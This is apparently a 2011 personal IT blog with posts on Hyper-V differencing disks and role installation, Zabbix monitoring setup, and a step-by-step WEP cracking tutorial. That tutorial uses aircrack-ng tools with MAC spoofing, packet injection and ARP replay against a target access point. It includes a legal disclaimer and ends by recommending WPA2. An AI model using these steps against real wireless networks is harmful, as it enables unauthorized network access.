Monday, September 26, 2011

Virtual Hard Disk

One feature in Microsoft Hyper-V caught my attention in the standard virtualization environment. I think some of you might have heard about static disk or thin disk provisioning.

Microsoft did a good job in introducing a new type of disk, which they call a differencing disk. Microsoft Hyper-V uses the virtual hard drive, or VHD, to store virtual machine data. The disk can be created in a very simple environment or in a very complex one. To give you an idea, have a look at the figure below:


The main problem with this type of deployment is that it is very hard to identify which disk is a differencing disk and which is a normal disk, so as a best practice the disks need to be given meaningful names.
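When the file names do not tell you, the VHD itself does. The following is an added example, not part of the original post: it reads the disk type from the VHD footer and, for a differencing disk, the parent name from the dynamic header. The names `inspect_vhd` and `build_sample` are hypothetical, the sample images are constructed, and the parent name is assumed to be stored as big-endian UTF-16.

```python
import struct

DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}

def vhd_checksum(block: bytes, field_off: int) -> int:
    """One's complement of the byte sum, with the 4-byte checksum field zeroed."""
    zeroed = block[:field_off] + b"\0" * 4 + block[field_off + 4:]
    return ~sum(zeroed) & 0xFFFFFFFF

def inspect_vhd(f) -> dict:
    """Classify a VHD (binary file object) from its 512-byte footer."""
    f.seek(-512, 2)                          # the footer is the last sector
    footer = f.read(512)
    if footer[:8] != b"conectix":
        raise ValueError("no VHD footer found")
    data_off, = struct.unpack(">Q", footer[16:24])
    disk_type, stored = struct.unpack(">II", footer[60:68])
    info = {
        "type": DISK_TYPES.get(disk_type, f"unknown({disk_type})"),
        "footer_ok": stored == vhd_checksum(footer, 64),
        "parent": None,
    }
    if disk_type == 4:                       # child disk: look up its base
        f.seek(data_off)
        header = f.read(1024)
        if header[:8] != b"cxsparse":
            raise ValueError("differencing disk without dynamic header")
        # Parent name: 512 bytes at offset 64, NUL padded (UTF-16BE assumed).
        info["parent"] = header[64:576].decode("utf-16-be").rstrip("\0")
    return info

def build_sample(disk_type: int, parent: str = "") -> bytes:
    """Constructed image for the demo: optional header plus footer, no data."""
    body, data_off = b"", 0xFFFFFFFFFFFFFFFF   # fixed disks have no header
    if disk_type != 2:
        hdr = bytearray(1024)
        hdr[:8] = b"cxsparse"
        hdr[64:64 + 2 * len(parent)] = parent.encode("utf-16-be")
        body, data_off = bytes(hdr), 0
    footer = bytearray(512)
    footer[:8] = b"conectix"
    footer[16:24] = struct.pack(">Q", data_off)
    footer[60:64] = struct.pack(">I", disk_type)
    footer[64:68] = struct.pack(">I", vhd_checksum(bytes(footer), 64))
    return body + bytes(footer)
```

Open a real file with `open(path, "rb")` and pass it to `inspect_vhd`; a `footer_ok` of `False` means the footer was altered or damaged after it was written.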

I see this feature as good for deploying QA or development servers. You can quickly set up a new instance within minutes.

The steps below show you how to configure a differencing disk.

Requirement: You must have a base Operating system installed.

Step 1:

Step 2:

Step 3: 
Key in a new name for your new disk

Step 4:
Locate the existing base disk that you would like to use

Step 5:

Please take note that the base disk needs to be set read-only to avoid any alteration from the child disk, and make sure you back up the base operating system VHD. If not, you will get an error message as below.
When you hit the screen above, you have 2 options that will help you reconnect the child to the base disk:
1) Inspect disk
2) Edit disk

So my recommendation is: do not use this in a production environment, especially in a cluster environment, as it might impact performance. As I mentioned, it is good for DEV or QA. Once you are comfortable with the machine you can convert the disk into a dynamic or fixed disk.

The steps below show you how.
Step 1:


Step 2:

Step 3:

Step 4:

Step 5:
 

After you have converted the disk to a fixed or dynamic disk, make sure you configure your VM to locate the new VHD.

As you can see, deploying a test server takes only a few clicks :).

Thursday, September 22, 2011

Wireless Hacking - Wired Equivalent Privacy (WEP)

The easiest hacking I see is Wired Equivalent Privacy (WEP) hacking, but there are still a lot of people using it. Maybe they need to be trained to understand the risk behind it.

Some of the companies I see use Wired Equivalent Privacy (WEP) and believe MAC address filtering will protect their infrastructure from unauthorized users. Here I will show you some of the basics. Let me give you a short summary of what is needed. You will need a wireless device, and I recommend the device below



The strange thing is that the device is from Taiwan and I was trying to look for it, but no one is aware of the brand. You can purchase the device from DBROTH via Amazon Fulfillment.

Overview of Wired Equivalent Privacy (WEP)

WEP keys come in two sizes: 40 bit (5 byte) and 104 bit (13 byte). Initially, vendors supported only 40-bit keys. By today’s standards, 40-bit keys are ridiculously small.

Today, many people use 104-bit keys. It should be noted that some vendors refer to these as 64-bit and 128-bit keys. A few vendors even support 256-bit keys. Vendors arrive at these numbers because Wired Equivalent Privacy (WEP) uses a 24-bit initialization vector (IV), which they count together with the key. Because the IVs are sent in the clear, however, the key length is effectively 40 or 104 bits.
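The key-size arithmetic above, as an added example that is not part of the original post: a minimal WEP frame-body encapsulation showing that the RC4 seed is the 24-bit IV followed by the secret key, and that the receiver takes the IV straight from the unencrypted start of the frame. The function names and the sample keys are constructed for illustration.

```python
import struct
import zlib

def rc4(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream for `key`."""
    s, j = list(range(256)), 0
    for i in range(256):                          # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):                            # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def seed_bits(key: bytes) -> int:
    """Size of the per-frame RC4 seed (IV || key): the vendors' 64/128 bits."""
    return 8 * (3 + len(key))

def secret_bits(key: bytes) -> int:
    """Only the key is secret; the IV is visible in every frame."""
    return 8 * len(key)

def wep_encrypt(iv: bytes, key: bytes, payload: bytes) -> bytes:
    """Frame body: clear IV (3 bytes) + key-ID byte + RC4(payload || ICV)."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV is 3 bytes; key is 5 or 13 bytes")
    icv = struct.pack("<I", zlib.crc32(payload))  # CRC-32 integrity check value
    data = payload + icv
    return iv + b"\x00" + xor(data, rc4(iv + key, len(data)))

def wep_decrypt(key: bytes, body: bytes) -> bytes:
    iv, data = body[:3], body[4:]                 # IV is read from the frame itself
    plain = xor(data, rc4(iv + key, len(data)))
    payload, icv = plain[:-4], plain[-4:]
    if struct.pack("<I", zlib.crc32(payload)) != icv:
        raise ValueError("ICV mismatch")
    return payload

# Constructed sample keys, not taken from any real network.
KEY40, KEY104 = b"\x01\x02\x03\x04\x05", bytes(range(13))
```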

This article is provided for informational purposes only and its affiliates accept no liability for providing this information. Please only use it to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explain how to crack 64-bit and 128-bit Wired Equivalent Privacy (WEP) on many WIFI access points and routers using Backtrack, a live Linux distribution. Your mileage may vary. The basic theory is that we want to connect to an access point using WEP encryption, but we do not know the key. We will attack the WIFI router, making it generate packets for our cracking effort, finally cracking the WEP key. Please use this document at your own risk; the author of this document won't be responsible for any damage caused by anyone who uses this material.

Attacking Wired Equivalent Privacy(WEP) with client
Requirements:
Backtrack 4 on CD or USB
Computer with compatible 802.11 wireless card
Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 4. If you
haven’t figured that part out, you probably shouldn’t be trying to crack
WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel®
PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw

The above commands will enable monitor mode on the wireless chipset in
your computer. Next we must stop your WIFI card:

iwconfig

Take note of your wireless adapter’s interface name. Then stop the adapter
by issuing:

airmon-ng stop [device]

Then:

ifconfig [interface] down

Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]

It's now time to start the card in monitor mode by doing:

airmon-ng start [device]

Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of
the target network. Now we must start collecting data from the WIFI access
point for the attack:

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]


The above command will output the collected data to the file network.out.
This file will be fed into the WEP crack program when we are ready to crack
the WEP key.

Open another shell and leave the previous command running. Now we
need to generate some fake packets to the access point to speed up the
data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]


If this command is successful we will now generate many packets on the
target network so that we can crack the KEY. Type:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

or

aireplay-ng --arpreplay -h 00:11:22:33:44:66 -b [bssid] [device]


This will force the access point to send out a bunch of packets which we can
then use to crack the WEP key. Check your airodump-ng shell and you
should see the "data" section filling up with packets.


After about 10,000-20,000 packets you can begin cracking the WEP key. If there are
no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]


Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The "-n 128" signifies a 128-bit WEP key. If cracking fails, try a 64-bit key
by changing the value of -n to 64.


Once the crack is successful you will be left with the wireless key! Remove the ":"
characters from the output and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a
bad idea. I suggest you use WPA2 encryption on your wireless networks.
Good luck!







Tuesday, September 20, 2011

Installing Hyper-V role in Windows 2008 core

Managing a Windows 2008 Server Core system might be a nightmare for technical people who are used to the GUI. Microsoft states that the core system minimizes the number of patches needed. You can't use servermanagercmd here, as it is not part of the core system installation. On a core system we use ocsetup. To check the list of roles, type the following command: oclist | more

You will need to execute a single command to enable the feature. Please take note that the name Microsoft-Hyper-V is case sensitive. You must enter it as shown.





Don't worry too much about managing Hyper-V on a core system, as you can use Server Manager to add the server to the list as shown below. What you need to do is click on Connect to Server.

Installation Option For Hyper-V role in Windows 2008

The method of installing the Hyper-V role depends on the version of Windows Server 2008 you have installed. The installation options you see here apply to non-core Windows 2008. I will show you how to install it using the options listed below.

1)Server Manager MMC
2)Server Manager cmd

Both options do a pretty good job. One difference between the 2 options is that with servermanagercmd you have no way to stop it, while with Server Manager MMC you still have the option to stop it. If you ask me which option I would choose, I would strongly recommend option 2.

Server Manager MMC Installation Steps





Expect to see more network cards if you have more than 1. In this test lab I am installing on an IBM T400.




Server Manager CMD Installation Steps



To remove the Hyper-V role, issue the command servermanagercmd -remove hyper-v

Sunday, September 18, 2011

Installing Zabbix Server (Monitoring)

Hi there,

Here I would like to share how to build your own monitoring server using an open source system. What I show is performance monitoring of Windows machines, and I believe it can do more than that.

The area that I didn't cover is adding logic to the Zabbix server for when a certain scenario hits (e.g. DHCP stops).

The product is Zabbix, an open source platform for monitoring. You will need some Linux skills, which I am going to cover in this session. So far I find the tool quite good, and it can manage Windows machines as well. The drawback is that it is complicated. The operating system I would recommend you install is SUSE Enterprise Linux 10 or openSUSE. The operating system originates from Germany.

1)http://www.zabbix.com/
2)http://en.wikipedia.org/wiki/SUSE_Linux_distributions

Let me give you some idea of what to expect from this. You will have very nice graphical reports for CPU, memory, network interfaces and so on. Please take note that these are not part of the Zabbix default configuration and need customization.

Here are the steps; please give feedback if you have any suggestions or ideas.

Step 1: Installing SUSE Enterprise 10
Step 2: Installing Zabbix Monitoring Component
Step 3: Enabling SUSE Linux Module for Zabbix
Step 4: Configure PHP
Step 5: Configure Zabbix Web Interface
Step 6: Install & Configure zabbix client on Windows server
Step 7: Create Host For Monitoring
Step 8: Create Item For Monitoring

Create Item For Monitoring

This is the last step: input all the items that you would like to monitor. For example, if you would like to monitor CPU, open a cmd on the Windows server itself and type the following command

typeperf -qx | findstr Processor > cpu.txt

This will list all of the processor counters, and you need to find the right string, which has the following format

\UDPv6\Datagrams Sent/sec










Create Host For Monitoring

We are almost there. Now we need to create the host profile for monitoring.





Click on Create Host


Input the server name and the IP address of the target server you want to monitor




Install & Configure zabbix client on Windows server

1) Create a folder named zabbix at c:\program files\zabbix\

2) Copy zabbix_agentd.exe and zabbix_agentd.conf to the zabbix folder

3) Edit zabbix_agentd.conf with Notepad and add the following entry to it



4) Install Zabbix as a service by issuing the following command: "c:\program files\zabbix\zabbix_agentd.exe" -i -c zabbix_agentd.conf

5) Start the service by issuing the following command: "c:\program files\zabbix\zabbix_agentd.exe" -s -c zabbix_agentd.conf


Configure Zabbix Web Interface


The default username and password are the following:
Username : admin
Password : zabbix




















